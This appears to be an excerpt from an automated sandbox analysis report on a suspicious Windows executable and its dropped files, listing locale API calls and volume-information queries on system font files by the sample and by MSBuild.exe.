Source: C:\Users\user\Desktop\RPHbzz3JqY.exe | Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW | 0_2_00607DA2
Source: C:\Users\user\Desktop\RPHbzz3JqY.exe | Code function: EnumSystemLocalesW | 0_2_006076E3
Source: C:\Users\user\Desktop\RPHbzz3JqY.exe | Code function: EnumSystemLocalesW | 0_2_005FCEDB
Source: C:\Users\user\Desktop\RPHbzz3JqY.exe | Code function: EnumSystemLocalesW | 0_2_0060772E
Source: C:\Users\user\Desktop\RPHbzz3JqY.exe | Code function: EnumSystemLocalesW | 0_2_006077C9
Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW | 3_2_00567854
Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exe | Code function: GetLocaleInfoW | 3_2_00567AA7
Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP | 3_2_00567BCD
Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exe | Code function: GetLocaleInfoW | 3_2_0055D43D
Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exe | Code function: GetLocaleInfoW | 3_2_00567CD3
Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exe | Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW | 3_2_00567DA2
Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exe | Code function: EnumSystemLocalesW | 3_2_0055CEDB
Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exe | Code function: EnumSystemLocalesW | 3_2_005676E3
Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exe | Code function: EnumSystemLocalesW | 3_2_0056772E
Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exe | Code function: EnumSystemLocalesW | 3_2_005677C9
Source: C:\ProgramData\HM3SOlbpH71yEXUIEAOeIiGX.exe | Queries volume information: C:\ProgramData\HM3SOlbpH71yEXUIEAOeIiGX.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Queries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Queries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Queries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Queries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Queries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Queries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Queries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Queries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Queries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation
